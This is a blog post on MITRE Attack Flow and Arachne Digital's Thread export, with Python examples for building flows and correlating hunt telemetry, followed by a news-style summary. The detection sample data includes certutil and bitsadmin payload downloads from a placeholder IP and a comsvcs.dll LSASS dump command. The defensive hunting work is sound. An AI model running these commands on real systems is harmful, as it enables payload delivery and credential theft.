Full Report
Originally published at Arachne Digital.

Why "flows" are the next leap for threat-informed defence

ATT&CK already gives us the what of adversary behaviour. Attack Flow adds the how: the exact sequence, branching options, and dependencies an attacker follows to reach an objective. MITRE's Center for Threat-Informed Defense created the Attack Flow language so defenders can track multi-phase campaigns instead of isolated techniques, spot choke points, and prioritise counter-measures more effectively.

Traditional incident write-ups and Navigator layers capture individual events but not the bigger picture. By modelling a chain of tactics (initial access, privilege escalation, lateral movement, impact), security operations center (SOC) analysts can:

- Surface weak links an attacker must traverse.
- Map detections to every step, avoiding gaps between stages.
- Share machine-readable flows across blue-team tools (the format is STIX-compatible).

Attack Flow Builder

The web-based Attack Flow Builder is MITRE's canvas for turning raw attack data into an interactive storyline. In the browser you drag and drop ATT&CK techniques, assets, malware, vulnerabilities, and indicators onto a blank board, then draw arrows to show the order, or the parallel paths, in which those elements unfold during a real intrusion. Each node stores full metadata, so a single click can reveal discovery timestamps, references, or detection logic.

From there you can overlay the finished diagram on the classic ATT&CK matrix to see defensive coverage at a glance, or export the model in several formats: STIX for automation pipelines, a standalone .afb file for sharing, PNG for slide decks, or Markdown-friendly Mermaid code for wikis.
Because every element in the flow is machine-readable, teams can version-control their diagrams and attach them to post-incident reports without re-formatting. In short, the Builder turns a static list of tactics, techniques and procedures (TTPs) into a living map that SOC analysts, threat hunters, and CISOs can all read, refine, and act on.

Thread to Attack Flow: closing the loop between cyber threat intelligence and action

Thread already maps free-text reporting to ATT&CK TTPs, dates, IOCs, and victims. Our new "Export Flow AFB" button turns that structured output into a ready-made Attack Flow file you can open in the Builder. No manual re-typing, no copy-paste from PDFs.

How this works in practice

1. Thread uses machine learning to map free text to ATT&CK TTPs.
2. A human analyst accepts or rejects the suggested TTPs and adds any that Thread missed. They also add a time frame, aggressor and victim information, and tag indicators of compromise (IoCs).
3. Once the report is processed, the analyst clicks Export Flow AFB. Thread serialises the TTPs and IoCs into the Attack Flow v3 schema, bundles them as incident-name.afb, and sends the file to the browser.
4. Open incident-name.afb in Attack Flow Builder; the TTPs and IoCs are all there. Use the Builder to order and structure the flow.

For this first iteration of the integration we did not want to duplicate the ordering functionality that already exists in Flow Builder, so the exported file contains the nodes but not their sequence; you draw the arrows in the Builder. We have also only added support for some of the basic data types, such as TTPs, malware, and IoCs. Thread is open source and continues to evolve: follow along on GitHub as we develop it, and community contributions are always welcome.

Where attack flows shine in day-to-day operations

- Detection gap analysis: overlay the flow on ATT&CK Navigator to see which stages lack telemetry.
  Thread can generate both the Navigator layer and the Flow Builder file from the same report.
- Post-incident reviews: replace static slide decks with clickable flows that link directly to log evidence.
- Adversary emulation: feed exported STIX into tools like Caldera to replay an attacker's exact sequence.
- Executive reporting: one diagram communicates campaign scope better than ten bullet points.

Flows are also great for threat hunting. Let's take a closer look.

Using Attack Flows to supercharge threat hunting

Threat hunting succeeds or fails on the quality of its hypotheses. Seasoned hunters begin with a structured question ("Could adversary X reach asset Y by chaining techniques A, B and C?") and then seek telemetry to prove or disprove it. Industry playbooks all describe the same core loop:

1. Generate a hypothesis
2. Assemble the right data
3. Investigate
4. Validate
5. Feed lessons back into detections

Thread helps with the hardest and most crucial part of that loop, hypothesis generation, by delivering cyber threat intelligence already mapped to ATT&CK. Each finished Thread report carries real-world context: timestamps, artifacts, and links to the original source. Instead of inventing scenarios from scratch that may or may not be relevant, hunters start with evidence-backed chains that adversaries have actually used.

Attack Flow then arranges those ATT&CK-tagged findings into a machine-readable storyline. Seeing that a phishing email (T1566) led to template injection (T1221), which cascaded into LSASS credential dumping (T1003.001), tells the hunter where to look next if the first query hits. Flows expose decision branches ("if privilege escalation fails, the attacker falls back to Kerberoasting"), so hunts follow every plausible path, not just the obvious or easy ones.
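The chain and branch just described, as an added example that is not part of the original post and is not Thread's exporter or the Builder's own code. It builds a small STIX 2.1 bundle using the Attack Flow extension's object types as the editor understands them from the public specification (the extension-definition ID and the attack-flow, attack-action and attack-condition objects with their start_refs, effect_refs, on_true_refs and on_false_refs fields are assumed from that spec, not taken from the article), then walks the arrows to list every root-to-leaf path and to answer "what do I query next after this technique hits". The Kerberoasting ID T1558.003 is supplied here; the article names the technique without an ID.

```python
import json
import uuid
from datetime import datetime, timezone

# Extension-definition ID of the Attack Flow STIX extension (assumed from the public
# spec; check it against the Attack Flow version your tooling expects).
AF_EXT = "extension-definition--fb9c968a-745b-4ade-9b25-c324172197f4"
# Properties that carry the "arrows" of a flow, in traversal order.
NEXT_KEYS = ("effect_refs", "on_true_refs", "on_false_refs")


def _obj(kind, **fields):
    """Minimal STIX 2.1 SDO skeleton with the Attack Flow extension attached."""
    now = datetime.now(timezone.utc).strftime("%Y-%m-%dT%H:%M:%S.000Z")
    obj = {"type": kind, "spec_version": "2.1", "id": f"{kind}--{uuid.uuid4()}",
           "created": now, "modified": now}
    obj.update(fields)
    obj["extensions"] = {AF_EXT: {"extension_type": "new-sdo"}}
    return obj


def build_flow():
    """Constructed flow: phishing -> template injection -> condition on privilege
    escalation -> LSASS dump (true branch) or Kerberoasting (false branch)."""
    lsass = _obj("attack-action", name="OS Credential Dumping: LSASS Memory",
                 technique_id="T1003.001")
    kerb = _obj("attack-action", name="Kerberoasting", technique_id="T1558.003")
    privesc = _obj("attack-condition", description="Privilege escalation succeeded",
                   on_true_refs=[lsass["id"]], on_false_refs=[kerb["id"]])
    tmpl = _obj("attack-action", name="Template Injection", technique_id="T1221",
                effect_refs=[privesc["id"]])
    phish = _obj("attack-action", name="Phishing", technique_id="T1566",
                 effect_refs=[tmpl["id"]])
    flow = _obj("attack-flow", name="Constructed intrusion chain", scope="incident",
                start_refs=[phish["id"]])
    return {"type": "bundle", "id": f"bundle--{uuid.uuid4()}",
            "objects": [flow, phish, tmpl, privesc, lsass, kerb]}


def to_json(bundle):
    return json.dumps(bundle, indent=2)


def enumerate_paths(bundle):
    """Every root-to-leaf path as technique IDs; conditions appear as '?<description>'."""
    by_id = {o["id"]: o for o in bundle["objects"]}
    paths = []

    def walk(node_id, trail, seen):
        node = by_id[node_id]
        if node_id in seen:                      # hand-drawn flows can contain loops
            paths.append(trail + ["<cycle>"])
            return
        label = node.get("technique_id") or "?" + node.get("description", node["type"])
        trail = trail + [label]
        nxt = [r for k in NEXT_KEYS for r in node.get(k, [])]
        if not nxt:
            paths.append(trail)
        for r in nxt:
            walk(r, trail, seen | {node_id})

    for flow in (o for o in bundle["objects"] if o["type"] == "attack-flow"):
        for start in flow["start_refs"]:
            walk(start, [], frozenset())
    return paths


def next_techniques(bundle, technique_id):
    """After a hit on technique_id, the techniques to query for next. Conditions and
    operators are looked through, so both sides of a branch are returned."""
    by_id = {o["id"]: o for o in bundle["objects"]}
    out = []

    def collect(ref):
        node = by_id[ref]
        if node["type"] == "attack-action":
            out.append(node["technique_id"])
        else:
            for k in NEXT_KEYS:
                for r in node.get(k, []):
                    collect(r)

    for o in bundle["objects"]:
        if o.get("technique_id") == technique_id:
            for k in NEXT_KEYS:
                for r in o.get(k, []):
                    collect(r)
    return out


if __name__ == "__main__":
    b = build_flow()
    for p in enumerate_paths(b):
        print(" -> ".join(p))
    print("after T1221 look for:", next_techniques(b, "T1221"))
```

The traversal is what gives the hunter the "where to look next" pivot: a hit on T1221 returns both T1003.001 and T1558.003, so a hunt that only chased the LSASS branch would miss the fallback. Bundles exported from the Builder can carry attack-operator nodes as well; they have no technique_id and are looked through the same way as conditions.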
Flows also help teams avoid the classic "rabbit-hole" problem of chasing an endless number of possible but irrelevant scenarios.

The result is a repeatable, evidence-driven methodology:

1. Scope and objective: import the Thread-generated .afb into Builder and choose the branch that threatens your crown-jewel asset. You might see that a threat actor which recently targeted an industry peer in your geography used Ingress Tool Transfer to deploy tools to a company device, then immediately opened a command prompt to start gathering data.
2. Hypothesis: "If any host shows Command and Scripting Interpreter (T1059) within five minutes after Ingress Tool Transfer (T1105), we may have an intrusion in progress." Both the ordering and the window come from the observed tradecraft; tune them to the intelligence rather than treating five minutes as a universal threshold.
3. Data collection and hunt: pull endpoint and network logs keyed to those technique IDs. The Detection section of each ATT&CK technique page lists the data sources and components to query.
4. Investigation and validation: follow the flow's arrows to pivot from one TTP to the next.
5. Detection engineering: convert successful queries into permanent analytics, and update the flow if new intelligence shifts the sequence.

In short, flows give hunters a roadmap. They keep every query tied to a real adversary behaviour, reduce guesswork, and let teams measure coverage by ticking off techniques. That is the structure SOC analysts want and the accountability IT security managers need.

Resources

For those who want to learn more about Attack Flows and Thread:

- The Attack Flow v3 page
- Attack Flow on GitHub
- Attack Flow Builder
- Attack Flow Training
- Thread
- Thread on GitHub
- How to use Thread

Start building Attack Flows

Attack Flow turns static cyber threat intelligence into an interactive map of attacker behaviour. By integrating Thread with the Flow Builder, Arachne Digital removes the busywork of diagramming and lets SOC teams see, share, and counter multi-stage campaigns faster.

Ready to try it?
Log in to Thread, process a report, and hit Export Flow AFB. If you don't want the hassle of gathering cyber threat intelligence and mapping it to MITRE ATT&CK yourself, reach out to us about our API offering.

"From Reports to Routes: Visualising Adversary Paths with Thread and MITRE Attack Flow Builder" was originally published in MeetCyber on Medium.
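The hunt hypothesis from the methodology above ("T1059 within five minutes after T1105 on the same host"), as an added example that is not part of the original post and not Thread's or the Builder's code. It runs ordered, windowed correlation over constructed endpoint telemetry that has already been tagged with ATT&CK technique IDs (as an EDR mapping layer or detection pipeline would tag it; the hostnames, commands and the 203.0.113.5 documentation address are all made up). It goes one step further than the single pair in the text: chain_hits takes a whole flow branch as an ordered list of techniques, which is what "follow the flow's arrows to pivot from one TTP to the next" looks like as a query.

```python
from collections import defaultdict, deque
from datetime import datetime, timedelta, timezone

# Constructed sample telemetry: (host, UTC timestamp, ATT&CK technique, detail).
SAMPLE_EVENTS = [
    ("ws-017", "2024-05-21T09:02:10Z", "T1105", "certutil.exe -urlcache -f http://203.0.113.5/up.dat up.dat"),
    ("ws-017", "2024-05-21T09:03:41Z", "T1059", "cmd.exe /c whoami /all"),
    ("ws-017", "2024-05-21T09:05:00Z", "T1003.001", "rundll32.exe comsvcs.dll MiniDump 712 C:\\Users\\Public\\l.dmp full"),
    ("ws-042", "2024-05-21T11:15:00Z", "T1105", "software-update agent download"),
    ("ws-042", "2024-05-21T11:45:30Z", "T1059", "powershell.exe -File inventory.ps1"),  # 30 min later: outside window
    ("srv-03", "2024-05-21T13:00:00Z", "T1059", "cmd.exe /c dir C:\\Users"),
    ("srv-03", "2024-05-21T13:01:00Z", "T1105", "bitsadmin /transfer j /download http://203.0.113.5/t.exe C:\\Users\\Public\\t.exe"),  # reversed order
]


def parse_ts(ts):
    return datetime.strptime(ts, "%Y-%m-%dT%H:%M:%SZ").replace(tzinfo=timezone.utc)


def sequence_hits(events, first="T1105", then="T1059", window_s=300):
    """Hosts where `then` is observed within `window_s` seconds AFTER `first`.
    Order is part of the hypothesis: `then` preceding `first` is not a hit."""
    window = timedelta(seconds=window_s)
    by_host = defaultdict(list)
    for host, ts, tech, detail in events:
        by_host[host].append((parse_ts(ts), tech, detail))
    hits = []
    for host, evs in by_host.items():
        evs.sort()
        open_windows = deque()                 # (time, detail) of recent `first` events
        for t, tech, detail in evs:
            if tech == first:
                open_windows.append((t, detail))
            elif tech == then:
                while open_windows and t - open_windows[0][0] > window:
                    open_windows.popleft()     # expired: too long since the transfer
                for t0, d0 in open_windows:
                    hits.append({"host": host, "first_at": t0, "then_at": t,
                                 "gap_s": int((t - t0).total_seconds()),
                                 "first": d0, "then": detail})
    return hits


def chain_hits(events, chain, window_s=300):
    """Generalisation to a whole flow branch: hosts showing every technique in
    `chain`, in order, each within `window_s` of the previous. Returns {host: [times]}."""
    window = timedelta(seconds=window_s)
    by_host = defaultdict(list)
    for host, ts, tech, _ in events:
        by_host[host].append((parse_ts(ts), tech))
    matched = {}
    for host, evs in by_host.items():
        evs.sort()

        def advance(step, after):
            # Depth-first: find the next technique strictly after `after` and inside the window.
            if step == len(chain):
                return []
            for t, tech in evs:
                if tech == chain[step] and (after is None or after < t <= after + window):
                    rest = advance(step + 1, t)
                    if rest is not None:
                        return [t] + rest
            return None

        times = advance(0, None)
        if times is not None:
            matched[host] = times
    return matched


if __name__ == "__main__":
    for h in sequence_hits(SAMPLE_EVENTS):
        print(f"{h['host']}: T1105 -> T1059 in {h['gap_s']}s: {h['first']} ; {h['then']}")
    print("full branch:", chain_hits(SAMPLE_EVENTS, ["T1105", "T1059", "T1003.001"]))
```

Two of the three hosts are deliberately non-hits: ws-042 shows both techniques but 30 minutes apart, and srv-03 shows them in the wrong order. Widening the window to an hour pulls ws-042 in, which is the tuning trade-off step 2 of the methodology is about.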
Analysis Summary
# Morning News Roll-up 2024-05-22
## Overview
This report focuses on the evolution of threat-informed defense through "Attack Flows." By moving beyond static lists of techniques to sequential, machine-readable maps, defenders can better visualize adversary behavior, identify choke points, and automate the transition from raw intelligence to actionable detection and hunting strategies.
## Top Stories
### Advancing Threat-Informed Defense with MITRE Attack Flow
- Summary: The introduction of the Attack Flow language by MITRE’s Center for Threat-Informed Defense allows security teams to track the "how" of an attack, not just the "what." Unlike traditional ATT&CK Navigator layers that show isolated techniques, Attack Flows model the exact sequence, branching paths, and dependencies an attacker follows. This structured approach helps SOC analysts identify the specific "weak links" in an attack chain and ensures that detection coverage spans the entire lifecycle of an intrusion.
- Source: hxxps://arachne[.]digital/blog/from-reports-to-routes-visualising-adversary-paths-with-thread-and-mitre-attack-flow-builder/
### Integrating Cyber Threat Intelligence (CTI) with Attack Flow Builder
- Summary: Arachne Digital has integrated its "Thread" tool with MITRE’s Attack Flow Builder to automate the creation of attack diagrams. Using machine learning, Thread extracts TTPs, IoCs, and metadata from free-text reports. These are now exportable as .afb files, which can be visualized in the Flow Builder. This integration reduces manual labor for analysts, allowing them to transform static PDF reports into interactive, STIX-compatible models ready for sharing across blue-team tools or ingestion into adversary emulation platforms like Caldera.
- Source: hxxps://github[.]com/Arachne-Digital/thread
### Supercharging Threat Hunting via Sequence Modeling
- Summary: Attack Flows are being used to improve threat hunting by moving away from hypothetical "shots in the dark" toward evidence-backed hypotheses. By visualizing specific sequences, such as Ingress Tool Transfer (T1105) followed within five minutes by Command and Scripting Interpreter (T1059), hunters can write high-fidelity, order-aware queries. The methodology also captures the "decision branches" an adversary takes, such as falling back to Kerberoasting if privilege escalation fails, so that hunts follow every plausible path an attacker might use to reach "crown-jewel" assets.
- Source: hxxps://ctid[.]mitre[.]org/projects/attack-flow/
## Technical Details (Contextual Summary)
### TTPs Mentioned
- **Phishing (T1566):** Initial access vector.
- **Template Injection (T1221):** Defense Evasion; a malicious document fetches a remote template once the phishing lure is opened.
- **OS Credential Dumping: LSASS Memory (T1003.001):** Credential Access phase.
- **Ingress Tool Transfer (T1105):** Command and Control; delivery of attacker tooling to a compromised host.
- **Command and Scripting Interpreter (T1059):** Execution; post-compromise commands run shortly after the tool transfer.
### Affected Systems
- Enterprise endpoints (specifically targets of credential dumping and tool transfers).
- Windows environments (implied by LSASS and Kerberoasting references).
### Mitigations & Defensive Actions
- **Detection Gap Analysis:** Overlaying flows on the ATT&CK Navigator to find telemetry blind spots.
- **Adversary Emulation:** Exporting flow data to tools like Caldera to replay specific sequences for defense validation.
- **Detection Engineering:** Converting validated hunt queries (e.g., T1059 occurring within five minutes after T1105 on the same host) into permanent analytics.
- **Post-Incident and Executive Reporting:** Utilizing clickable flows linked to log evidence in place of static slide decks.